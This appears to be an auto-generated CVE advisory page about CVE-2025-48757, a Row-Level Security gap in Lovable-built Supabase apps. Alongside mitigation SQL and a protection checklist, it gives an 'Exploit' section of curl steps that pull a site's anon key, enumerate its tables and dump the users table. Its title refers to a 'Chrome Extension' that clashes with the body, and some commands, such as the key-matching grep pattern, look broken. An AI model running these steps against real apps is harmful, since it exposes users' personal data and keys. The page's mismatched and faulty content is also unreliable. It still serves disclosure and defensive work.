Chrome Extension, Row-Level Security Bypass, CVE-2025-48757 (Critical) -DC-Oct2026-2790

Listen to this Post

CVE-2025-48757 is a critical insufficient Row-Level Security (RLS) policy vulnerability in Lovable-generated Supabase applications, allowing remote unauthenticated attackers to read or write arbitrary database tables. The flaw arises because Lovable’s AI scaffolding often creates Supabase tables without enabling RLS or with permissive policies, leaving the `anon` key capable of full table access. Attackers can enumerate exposed tables via the Supabase REST API, extract sensitive data such as API keys, email addresses, and user records, or inject malicious rows. The vulnerability affects any Lovable project created through 2025-04-15 that uses Supabase as its backend. Exploitation requires only the public anon key, which is embedded in client-side JavaScript by default. Detection involves analyzing the Supabase endpoint for permissive RLS policies or using the Supabase client to test unauthorized access. The root cause is a combination of AI-generated code lacking security guardrails and developers not auditing the generated database schemas. Over 170 applications were initially identified as exposed. The vulnerability is classified as critical because it enables full database compromise without authentication. Mitigation requires manually enabling RLS on all tables and defining strict policies. The CVE highlights the risks of AI-assisted development when security best practices are omitted. Patching involves updating the Supabase schema and reviewing all table policies. The vulnerability was disclosed in May 2025 and remains a significant threat to AI-coded applications. Regular security audits of Supabase projects are essential to prevent similar exposures.

DailyCVE Form:

Platform: Lovable
Version: Through 2025-04-15
Vulnerability: RLS bypass
Severity: Critical
date: 2025-05-30

Prediction: 2025-06-15

What Undercode Say:

Analytics:

curl -X GET "https://<project-ref>.supabase.co/rest/v1/users?select=" \
-H "apikey: <anon-key>" \
-H "Authorization: Bearer <anon-key>"
const { createClient } = require('@supabase/supabase-js');
const supabase = createClient('https://<project-ref>.supabase.co', '<anon-key>');
const { data, error } = await supabase.from('users').select('');
console.log(data);
-- Check RLS status
SELECT schemaname, tablename, rowsecurity
FROM pg_tables
WHERE schemaname = 'public';
-- Enable RLS
ALTER TABLE public.users ENABLE ROW LEVEL SECURITY;
-- Create policy
CREATE POLICY "Allow authenticated read" ON public.users
FOR SELECT USING (auth.role() = 'authenticated');

Exploit: (Educational Purposes!)

Step 1: Extract anon key from client-side JS
curl -s https://target-lovable-app.com | grep -o 'eyJ[a-zA-Z0-9_-].[a-zA-Z0-9_-].[a-zA-Z0-9_-]'
Step 2: List all tables via Supabase REST
curl -s "https://<project-ref>.supabase.co/rest/v1/" \
-H "apikey: <anon-key>" \
-H "Authorization: Bearer <anon-key>"
Step 3: Dump sensitive table
curl -s "https://<project-ref>.supabase.co/rest/v1/users?select=" \
-H "apikey: <anon-key>" \
-H "Authorization: Bearer <anon-key>"

Protection: from this CVE

  • Enable Row-Level Security on all Supabase tables.
  • Define explicit RLS policies for each table (e.g., auth.uid() = user_id).
  • Never expose the `service_role` key in client-side code.
  • Use the Supabase dashboard to audit RLS status regularly.
  • Implement a CI/CD check that verifies RLS is enabled before deployment.
  • Restrict the `anon` role to only necessary operations.
  • Monitor Supabase logs for unusual REST API queries.

Impact:

  • Unauthenticated attackers can read, modify, or delete any data in exposed tables.
  • Sensitive information such as API keys, emails, and personal data may leak.
  • Attackers can inject malicious records or escalate privileges within the application.
  • Over 170 applications were confirmed vulnerable, affecting thousands of users.
  • The vulnerability undermines trust in AI-generated code and requires costly remediation.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top